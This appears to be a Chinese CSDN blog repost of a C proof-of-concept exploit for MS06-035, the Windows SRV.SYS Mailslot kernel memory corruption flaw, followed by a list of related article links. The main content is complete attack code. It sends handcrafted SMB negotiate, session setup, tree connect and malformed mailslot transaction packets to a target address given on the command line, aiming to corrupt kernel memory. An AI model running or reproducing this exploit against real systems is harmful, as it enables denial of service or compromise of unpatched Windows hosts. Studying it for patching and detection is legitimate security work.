MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)

最新推荐文章于 2019-03-09 12:20:20 发布
最新推荐文章于 2019-03-09 12:20:20 发布
阅读量1.5k 收藏
点赞数
文章标签: windows session microsoft server socket struct
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/1016634
版权
Rated as : Critical

#include <stdio.h>
#include <windows.h>
#include <winsock.h>

/*******************************************************************
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit

by cocoruder(frankruder_at_hotmail.com),2006.7.19
page:http://ruder.cdut.net
*******************************************************************/


unsigned char SmbNeg[] =
"/x00/x00/x00/x2f/xff/x53/x4d/x42/x72/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x88/x05/x00/x00/x00/x00/x00/x0c/x00/x02/x4e/x54"
"/x20/x4c/x4d/x20/x30/x2e/x31/x32/x00";

unsigned char Session_Setup_AndX_Request[]=
"/x00/x00/x00/x48/xff/x53/x4d/x42/x73/x00"
"/x00/x00/x00/x08/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/xff/xff/x88/x05/x00/x00/x00/x00/x0d/xff/x00/x00/x00/xff"
"/xff/x02/x00/x88/x05/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x01/x00/x00/x00/x0b/x00/x00/x00/x6e/x74/x00/x70/x79/x73/x6d"
"/x62/x00";

unsigned char TreeConnect_AndX_Request[]=
"/x00/x00/x00/x58/xff/x53/x4d/x42/x75/x00"
"/x00/x00/x00/x18/x07/xc8/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/xff/xfe/x00/x08/x00/x03/x04/xff/x00/x58/x00/x08"
"/x00/x01/x00/x2d/x00/x00/x5c/x00/x5c/x00/x31/x00/x37/x00/x32/x00"
"/x2e/x00/x32/x00/x32/x00/x2e/x00/x35/x00/x2e/x00/x34/x00/x36/x00"
"/x5c/x00/x49/x00/x50/x00/x43/x00/x24/x00/x00/x00/x3f/x3f/x3f/x3f"
"/x3f/x00";

unsigned char Trans_Request[]=
"/x00/x00/x00/x56/xff/x53/x4d/x42/x25/x00"
"/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x08/x88/x05/x00/x08/x00/x00/x11/x00/x00/x01/x00/x00"
"/x04/xe0/xff/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x55"
"/x00/x01/x00/x55/x00/x03/x00/x01/x00/x00/x00/x00/x00/x11/x00/x5c"
"/x4d/x41/x49/x4c/x53/x4c/x4f/x54/x5c/x4c/x41/x4e/x4d/x41/x4e/x41";


unsigned char recvbuff[2048];





void neg ( int s )
{
char response[1024];

memset(response,0,sizeof(response));

send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}

void main(int argc,char **argv)
{
struct sockaddr_in server;
SOCKET sock;
DWORD ret;
WSADATA ws;

WORD userid,treeid;


WSAStartup(MAKEWORD(2,2),&ws);

sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}

server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons((USHORT)atoi(argv[2]));

ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("connect error!/n");
return;
}

neg(sock);

recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

ret=send(sock,(char
*)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!/n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

userid=*(WORD *)(recvbuff+0x20); //get userid


memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


ret=send(sock,(char
*)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!/n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

treeid=*(WORD *)(recvbuff+0x1c); //get treeid

memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid

ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
if (ret<=0)
{
printf("send Trans_Request error!/n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

}
 
iiprogram
关注
【并发编程四】windows进程通信和Linux进程通信
junxuezheng的博客
11-12 1782
原本写完上一篇[【并发编程三】C++进程通信(管道pipe)],就准备写消息队列的c++demo了,但是真正查找资料才发现网上都是linux下的消息队列的c++demo,就没有windows下的消息队列的进程通信的demwindows没有信号这个概念,但是会提供类似功能的api,比如,杀死进程:linux下的kill信号,windows下提供TerminateProcess的api接口。
MailSlot简单封装和使用
08-31
邮槽的简单封装,简要介绍,客户端和服务端简单demo,vs2010可直接编译运行。操作简单,邮槽的简单封装,简要介绍,客户端和服务端简单demo,vs2010可直接编译运行。操作简单,
mailslot用法
cutefelixzhang的专栏
07-13 684
<br />code number 1:<br /> <br />/*************************************/<br /><br />#include <windows.h><br />#include <tchar.h><br />#include <stdio.h><br /> <br />HANDLE hSlot;<br />LPTSTR SlotName = TEXT("////.//mailslot//sample_mailslot");<br /> <br />
进程间通信(四):利用邮槽
憩园幽幽的专栏
06-27 621
进程间通信(四):利用邮槽进程间通信的四种方式1)  剪贴板2)  匿名管道3)  命名管道4)  邮槽邮槽是基于广播通信体系设计出来的,它采用无连接的不可靠的数据传输。邮槽是一种单向通信机制,创建邮槽的服务器进程读取数据,打开邮槽的客户机进程写入数据。为保证邮槽在各种Windows平台下都能够正常工作,我们传输消息的时候,应将消息的长度限制在424字节以下。
window系统下的远程堆栈溢出 --《实战篇》
老鬼的专栏
07-30 1473
作者:ipxodi (ipxodi@263.net)       下面是一个有问题的internet服务程序: /****************************************************************************/ /*    server.cpp By Ipxodi     */   #include #include char Buf
AutoHotkey-Mailslot:Windows Mailslot API 包装器
07-07
Windows API 包装器 需要 AutoHotkey v1.1.16.05+ 或 v2.0-a056+ 执照: 邮槽.ahk 共同属性 Name - 邮槽的名称,不带\\.\mailslot\前缀 Filename - 请参阅 邮槽服务器 构造函数 server := new Mailslot( name , ...
ch6-1 Windows进程通信 线程互斥和同步1
08-03
Windows操作系统中,进程通信和线程互斥与同步是多任务环境下的核心概念,确保了不同进程之间数据的一致性和正确性。本章节主要探讨了Windows 2000/XP及其后续版本中实现这些功能的各种机制。 首先,我们来看一下...
精通Windows.API-函数、接口、编程实例.pdf
01-27
11.1 邮槽(MailSlot) 295 11.1.1 创建邮槽、从邮槽中读取消息 296 11.1.2 通过邮槽发送消息 299 11.2 管道(Pipe) 300 11.2.1 创建命名管道 300 11.2.2 管道监听 302 11.2.3 使用异步I/O进行读写 303 ...
VC编程-UNIX与Windows移植.doc
07-06
同时,进程间通信在两个系统中也有所不同,UNIX使用管道、消息队列和共享内存,而Windows则有自己的一套API,如CreateMutex()、CreateSemaphore()和Mailslot。 **信号和信号处理** 信号是UNIX中用于进程间通信和...
metasploit 攻击成功的实例
ropin_os的专栏
05-06 9640
      缓冲区溢出攻击能否成功,和目标机器的环境有很大关系,不同的操作系统版本,语言等等都会造成攻击不成功。至于原因,你可以看看缓冲区溢出的原理。估计很多新手和我一样,刚接触metasploit的时候,迫不及待的去做各种实验,但是成功率....这或多或少打击了自信心,至少我是这样的,连着几天一个都成功不了,顿时兴趣大减。写这篇文章的目的很简单,将一些特别容易验证的漏洞,特别容易成功的漏洞告诉大家。以下漏洞都是经过我验证过的,对环境要求不是很高的。CVE                       编号
MS06-040漏洞分析回顾
Walter的专栏
09-12 2851
1、利用现有win2000 sp4系统的netapi32.dll发现目前大多数系统已经打上补丁,带补丁的ida代码如下: signed int __stdcall NetpwPathCanonicalize(wchar_t *Str, wchar_t *lpWideCharStr, int a3, wchar_t *Source, int a5, int a6) {   wchar_t *v
利用邮槽(mailslot)进行应用程序间的通讯实例
jiaoqiao123的博客
03-09 1277
在两个不同的应用程序之间可能需要传递数据,利用邮槽(mailslot)可以达成目标,一个程序(客户端)向邮槽写数据,另一个程序(服务端)负责接收数据。(为了保证在UNICODE与ANSI的通用,程序使用了tchar.h头文件,并尽可能使用通用类型TCHAR与相应的通用函数) 一、Demo代码(两个独立的应用程序,客户端发送倒计时数字) server端: #include&lt;Window...
【读书笔记】ndss2018_K-Miner_ Uncovering Memory Corruption in Linux
u012332816的博客
04-02 1230
论文笔记 题目 :K-Miner: Uncovering Memory Corruption in Linux 出处:NDSS 2018 作者:David Gens, Simon Schmitt, Simon Schmitt and Ahmad-Reza Sadeghi 单位:CYSEC/Technische Universitat Darmstadt, Universität of Duis
Microsoft Windows WebDAV Mini-Redirector远程堆溢出漏洞(MS08-007)
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-05 1428
导读:   涉及程序:   Microsoft Windows      描述:   Microsoft Windows WebDAV Mini-Redirector远程堆溢出漏洞(MS08-007)      详细:   Microsoft Windows是微软发布的非常流行的操作系统。   Windows系统的WebDAV客户端程序实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞通过
windows内核情景分析 --- 文件系统
maomao171314的专栏
04-04 3594
文件系统 一台机器上可以安装很多物理介质来存放资料(如磁盘、光盘、软盘、U盘等)。各种物理介质千差万别,都配备有各自的驱动程序,为了统一地访问这些物理介质,windows设计了文件系统机制。应用程序要访问存储在那些物理介质上的资料时,无需直接访问,只需借助文件系统即可对其有效访问。各种物理介质的存储方式千差万别,文件系统则按照‘文件’的概念,把要存储的资料以文件为单位进行存放,然后,读取的时候也
四种线程间的通信(笔记)
Nicholas黎的专栏
04-12 1186
有四种方法1.剪贴板  a.创建个ClipBoard的对话框应用程序,加两EditBox和两个Button发送接收。  b.具体代码:    发送端代码:if(OpenClipboard()){  CString str;  HANDLE hClip;  char *pBuf;  EmptyClipboard();  GetDlgItemText(IDC_EDIT_SEND,str);  hC
Windows网络编程:API、重定向器与管道技术
邮槽(Mailslot)和命名管道是Windows中实现进程间通信(IPC)的重要方式。第3章阐述了邮槽的实现细节,包括邮槽名字、消息长度、应用程序编译和错误处理。第4章则详细分析了命名管道的运作机制,包括命名规则、模式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值